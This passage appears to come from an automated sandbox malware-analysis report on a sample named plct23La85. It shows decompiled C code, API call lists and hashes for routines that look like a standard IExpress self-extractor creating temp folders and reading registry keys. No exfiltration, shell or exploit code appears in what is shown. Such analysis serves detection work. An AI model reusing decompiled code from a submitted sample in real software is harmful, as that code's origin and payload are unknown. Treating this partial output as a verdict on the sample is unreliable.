                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                    			}



































                                                                                                                                                                                                    0x001344b9
                                                                                                                                                                                                    0x001344c4
                                                                                                                                                                                                    0x001344cb
                                                                                                                                                                                                    0x001344d8
                                                                                                                                                                                                    0x001344e4
                                                                                                                                                                                                    0x001344eb
                                                                                                                                                                                                    0x001344ee
                                                                                                                                                                                                    0x001344ef
                                                                                                                                                                                                    0x001344ef
                                                                                                                                                                                                    0x001344f1
                                                                                                                                                                                                    0x001344f7
                                                                                                                                                                                                    0x001344f8
                                                                                                                                                                                                    0x0013467b
                                                                                                                                                                                                    0x001344fe
                                                                                                                                                                                                    0x00134509
                                                                                                                                                                                                    0x00134518
                                                                                                                                                                                                    0x00134525
                                                                                                                                                                                                    0x00134562
                                                                                                                                                                                                    0x00134568
                                                                                                                                                                                                    0x00134568
                                                                                                                                                                                                    0x0013456b
                                                                                                                                                                                                    0x0013456b
                                                                                                                                                                                                    0x0013456d
                                                                                                                                                                                                    0x0013456e
                                                                                                                                                                                                    0x00134572
                                                                                                                                                                                                    0x00134578
                                                                                                                                                                                                    0x0013457c
                                                                                                                                                                                                    0x001345cb
                                                                                                                                                                                                    0x00134607
                                                                                                                                                                                                    0x00134607
                                                                                                                                                                                                    0x0013460d
                                                                                                                                                                                                    0x00134613
                                                                                                                                                                                                    0x00134617
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013461d
                                                                                                                                                                                                    0x00134623
                                                                                                                                                                                                    0x00134626
                                                                                                                                                                                                    0x00134628
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134628
                                                                                                                                                                                                    0x001345cd
                                                                                                                                                                                                    0x001345cd
                                                                                                                                                                                                    0x001345cf
                                                                                                                                                                                                    0x001345cf
                                                                                                                                                                                                    0x001345d2
                                                                                                                                                                                                    0x001345d2
                                                                                                                                                                                                    0x001345d4
                                                                                                                                                                                                    0x001345d5
                                                                                                                                                                                                    0x001345db
                                                                                                                                                                                                    0x001345de
                                                                                                                                                                                                    0x001345e3
                                                                                                                                                                                                    0x001345e9
                                                                                                                                                                                                    0x001345ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001345f3
                                                                                                                                                                                                    0x001345fd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134602
                                                                                                                                                                                                    0x001345ed
                                                                                                                                                                                                    0x0013457e
                                                                                                                                                                                                    0x0013457e
                                                                                                                                                                                                    0x00134580
                                                                                                                                                                                                    0x00134580
                                                                                                                                                                                                    0x00134583
                                                                                                                                                                                                    0x00134583
                                                                                                                                                                                                    0x00134585
                                                                                                                                                                                                    0x00134586
                                                                                                                                                                                                    0x0013458a
                                                                                                                                                                                                    0x0013458c
                                                                                                                                                                                                    0x0013458f
                                                                                                                                                                                                    0x0013458f
                                                                                                                                                                                                    0x00134591
                                                                                                                                                                                                    0x00134592
                                                                                                                                                                                                    0x0013459b
                                                                                                                                                                                                    0x0013459e
                                                                                                                                                                                                    0x001345a3
                                                                                                                                                                                                    0x001345a9
                                                                                                                                                                                                    0x001345ad
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001345af
                                                                                                                                                                                                    0x001345af
                                                                                                                                                                                                    0x001345bf
                                                                                                                                                                                                    0x0013462d
                                                                                                                                                                                                    0x00134630
                                                                                                                                                                                                    0x0013463d
                                                                                                                                                                                                    0x0013464e
                                                                                                                                                                                                    0x0013464e
                                                                                                                                                                                                    0x0013463f
                                                                                                                                                                                                    0x00134640
                                                                                                                                                                                                    0x00134647
                                                                                                                                                                                                    0x0013464c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013464c
                                                                                                                                                                                                    0x00134666
                                                                                                                                                                                                    0x0013466d
                                                                                                                                                                                                    0x0013466f
                                                                                                                                                                                                    0x00134675
                                                                                                                                                                                                    0x00134675
                                                                                                                                                                                                    0x001345ad
                                                                                                                                                                                                    0x00134527
                                                                                                                                                                                                    0x0013452e
                                                                                                                                                                                                    0x0013453f
                                                                                                                                                                                                    0x0013453f
                                                                                                                                                                                                    0x00134530
                                                                                                                                                                                                    0x00134531
                                                                                                                                                                                                    0x00134538
                                                                                                                                                                                                    0x0013453d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013453d
                                                                                                                                                                                                    0x00134554
                                                                                                                                                                                                    0x0013455a
                                                                                                                                                                                                    0x0013455a
                                                                                                                                                                                                    0x0013455a
                                                                                                                                                                                                    0x00134525
                                                                                                                                                                                                    0x0013468c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 001345A3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 001345E3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 0013460D
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00134630
                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,nst0dum,00000000), ref: 00134666
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0013466F
                                                                                                                                                                                                      • Part of subcall function 0013681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0013686E
                                                                                                                                                                                                      • Part of subcall function 0013681F: GetSystemMetrics.USER32(0000004A), ref: 001368A7
                                                                                                                                                                                                      • Part of subcall function 0013681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001368CC
                                                                                                                                                                                                      • Part of subcall function 0013681F: RegQueryValueExA.ADVAPI32(?,00131140,00000000,?,?,0000000C), ref: 001368F4
                                                                                                                                                                                                      • Part of subcall function 0013681F: RegCloseKey.ADVAPI32(?), ref: 00136902
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$nst0dum
                                                                                                                                                                                                    • API String ID: 3244514340-614204707
                                                                                                                                                                                                    • Opcode ID: bfad095fe5566a2d6cb407bc88a551c5c3f97415874f80830b26ec308207535f
                                                                                                                                                                                                    • Instruction ID: 1a577a8bdeec15702766f8aed27cfdd6e65880d0890a0b03dbdfb274e186744e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfad095fe5566a2d6cb407bc88a551c5c3f97415874f80830b26ec308207535f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A75104B2A00219AFDB219F28CC49BBA7B79EF45300F1441A4FD49B7241DB71EE45CBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E001353A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                    				CHAR* _t20;
                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				CHAR* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                    				_t32 = __edx;
                                                                                                                                                                                                    				_t20 = __ecx;
                                                                                                                                                                                                    				_t29 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E0013171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                    					_t34 = _t34 + 0x10;
                                                                                                                                                                                                    					_t29 = _t29 + 1;
                                                                                                                                                                                                    					E00131680(_t32, 0x104, _t20);
                                                                                                                                                                                                    					E0013658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                    					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                    					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                    					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t29 < 0x190) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t30 = 0;
                                                                                                                                                                                                    					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                    						_t30 = 1;
                                                                                                                                                                                                    						DeleteFileA(_t32);
                                                                                                                                                                                                    						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return E00136CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t30 = 1;
                                                                                                                                                                                                    				 *0x138a20 = 1;
                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x001353ac
                                                                                                                                                                                                    0x001353b3
                                                                                                                                                                                                    0x001353b9
                                                                                                                                                                                                    0x001353bb
                                                                                                                                                                                                    0x001353bd
                                                                                                                                                                                                    0x001353bf
                                                                                                                                                                                                    0x001353d1
                                                                                                                                                                                                    0x001353d6
                                                                                                                                                                                                    0x001353e0
                                                                                                                                                                                                    0x001353e2
                                                                                                                                                                                                    0x001353f5
                                                                                                                                                                                                    0x001353fb
                                                                                                                                                                                                    0x00135402
                                                                                                                                                                                                    0x0013540b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135413
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135415
                                                                                                                                                                                                    0x00135416
                                                                                                                                                                                                    0x00135427
                                                                                                                                                                                                    0x0013542a
                                                                                                                                                                                                    0x0013542b
                                                                                                                                                                                                    0x00135434
                                                                                                                                                                                                    0x00135434
                                                                                                                                                                                                    0x0013543a
                                                                                                                                                                                                    0x0013544c
                                                                                                                                                                                                    0x0013544c
                                                                                                                                                                                                    0x00135452
                                                                                                                                                                                                    0x0013545a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013545e
                                                                                                                                                                                                    0x0013545f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013171E: _vsnprintf.MSVCRT ref: 00131750
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001353FB
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135402
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013541F
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013542B
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135434
                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135452
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                    • API String ID: 1082909758-3361814588
                                                                                                                                                                                                    • Opcode ID: 5665faa7df3e1d9dfbaecab8e99c143f8da94919ecadfe750869ffe45bb3aa2b
                                                                                                                                                                                                    • Instruction ID: 219de3cf0d072d90cfa409c413b35fc0d66e54d54326062678e5e48532e5fa06
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5665faa7df3e1d9dfbaecab8e99c143f8da94919ecadfe750869ffe45bb3aa2b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD1123B130060477D3289B369C49FAF3A6EEFD1721F400125FA86D2690DF74898286A2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 522 135467-135484 523 13548a-135490 call 1353a1 522->523 524 13551c-135528 call 131680 522->524 528 135495-135497 523->528 527 13552d-135539 call 1358c8 524->527 537 13553b-135545 CreateDirectoryA 527->537 538 13554d-135552 527->538 529 135581-135583 528->529 530 13549d-1354c0 call 131781 528->530 532 13558d-13559d call 136ce0 529->532 539 1354c2-1354d8 GetSystemInfo 530->539 540 13550c-13551a call 13658a 530->540 542 135577-13557c call 136285 537->542 543 135547 537->543 544 135585-13558b 538->544 545 135554-135557 call 13597d 538->545 546 1354da-1354dd 539->546 547 1354fe 539->547 540->527 542->529 543->538 544->532 553 13555c-13555e 545->553 551 1354f7-1354fc 546->551 552 1354df-1354e2 546->552 554 135503-135507 call 13658a 547->554 551->554 557 1354f0-1354f5 552->557 558 1354e4-1354e7 552->558 553->544 559 135560-135566 553->559 554->540 557->554 558->540 561 1354e9-1354ee 558->561 559->529 562 135568-135575 RemoveDirectoryA 559->562 561->554 562->529
                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00135467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t10;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR* _t48;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t10 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				if(__edx == 0) {
                                                                                                                                                                                                    					_t48 = 0x1391e4;
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00131680(0x1391e4, 0x104);
                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                    					_t13 = E001358C8(_t48); // executed
                                                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							 *0x139124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                    							return E00136CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t16 = E0013597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t61 =  *0x138a20; // 0x0
                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                    							 *0x138a20 = 0;
                                                                                                                                                                                                    							RemoveDirectoryA(_t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                    						 *0x139124 = E00136285();
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x138a20 = 1;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                    				_t20 = E001353A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t48 = 0x1391e4;
                                                                                                                                                                                                    				E00131781(0x1391e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                    				if(( *0x139a34 & 0x00000020) == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E0013658A(_t48, 0x104, 0x131140);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					E0013658A(_t48, 0x104);
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}




















                                                                                                                                                                                                    0x00135472
                                                                                                                                                                                                    0x00135479
                                                                                                                                                                                                    0x00135481
                                                                                                                                                                                                    0x00135484
                                                                                                                                                                                                    0x0013551c
                                                                                                                                                                                                    0x00135521
                                                                                                                                                                                                    0x00135528
                                                                                                                                                                                                    0x0013552d
                                                                                                                                                                                                    0x0013552f
                                                                                                                                                                                                    0x00135539
                                                                                                                                                                                                    0x0013554d
                                                                                                                                                                                                    0x0013554d
                                                                                                                                                                                                    0x00135552
                                                                                                                                                                                                    0x00135585
                                                                                                                                                                                                    0x00135585
                                                                                                                                                                                                    0x0013558b
                                                                                                                                                                                                    0x0013558d
                                                                                                                                                                                                    0x0013559d
                                                                                                                                                                                                    0x0013559d
                                                                                                                                                                                                    0x00135557
                                                                                                                                                                                                    0x0013555e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135560
                                                                                                                                                                                                    0x00135566
                                                                                                                                                                                                    0x00135569
                                                                                                                                                                                                    0x0013556f
                                                                                                                                                                                                    0x0013556f
                                                                                                                                                                                                    0x00135581
                                                                                                                                                                                                    0x00135581
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135581
                                                                                                                                                                                                    0x00135545
                                                                                                                                                                                                    0x0013557c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013557c
                                                                                                                                                                                                    0x00135547
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135547
                                                                                                                                                                                                    0x0013548a
                                                                                                                                                                                                    0x00135490
                                                                                                                                                                                                    0x00135497
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013549d
                                                                                                                                                                                                    0x001354ab
                                                                                                                                                                                                    0x001354b4
                                                                                                                                                                                                    0x001354c0
                                                                                                                                                                                                    0x0013550c
                                                                                                                                                                                                    0x00135511
                                                                                                                                                                                                    0x00135515
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135515
                                                                                                                                                                                                    0x001354c9
                                                                                                                                                                                                    0x001354d6
                                                                                                                                                                                                    0x001354d8
                                                                                                                                                                                                    0x001354fe
                                                                                                                                                                                                    0x00135503
                                                                                                                                                                                                    0x00135507
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135507
                                                                                                                                                                                                    0x001354da
                                                                                                                                                                                                    0x001354dd
                                                                                                                                                                                                    0x001354f7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001354f7
                                                                                                                                                                                                    0x001354df
                                                                                                                                                                                                    0x001354e2
                                                                                                                                                                                                    0x001354f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001354f0
                                                                                                                                                                                                    0x001354e7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001354e9
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001354C9
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013553D
                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013556F
                                                                                                                                                                                                      • Part of subcall function 001353A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001353FB
                                                                                                                                                                                                      • Part of subcall function 001353A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135402
                                                                                                                                                                                                      • Part of subcall function 001353A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013541F
                                                                                                                                                                                                      • Part of subcall function 001353A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013542B
                                                                                                                                                                                                      • Part of subcall function 001353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135434
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                    • API String ID: 1979080616-510557316
                                                                                                                                                                                                    • Opcode ID: b8dd9f409f67b51eb62c68dd62439a9845f43b79a51a62f7c660efe7c6ec5101
                                                                                                                                                                                                    • Instruction ID: 2a2f469318f8b2c94228e5833d47301fbb271503b5610c4184dbd6db7f61405e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8dd9f409f67b51eb62c68dd62439a9845f43b79a51a62f7c660efe7c6ec5101
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F3148B1B00B106BCB149F399C4597F7BABBFA1B50F05012AF846D3940DFB0DE818691
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 563 13256d-13257d 564 132583-132589 563->564 565 132622-132627 call 1324e0 563->565 567 13258b 564->567 568 1325e8-132607 RegOpenKeyExA 564->568 573 132629-13262f 565->573 572 132591-132595 567->572 567->573 569 1325e3-1325e6 568->569 570 132609-132620 RegQueryInfoKeyA 568->570 569->573 574 1325d1-1325dd RegCloseKey 570->574 572->573 575 13259b-1325ba RegOpenKeyExA 572->575 574->569 575->569 576 1325bc-1325cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E0013256D(signed int __ecx) {
                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				int _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                    				_t31 = 0;
                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                    					_t31 = E001324E0(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t34 = _t13 - 1;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                    						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
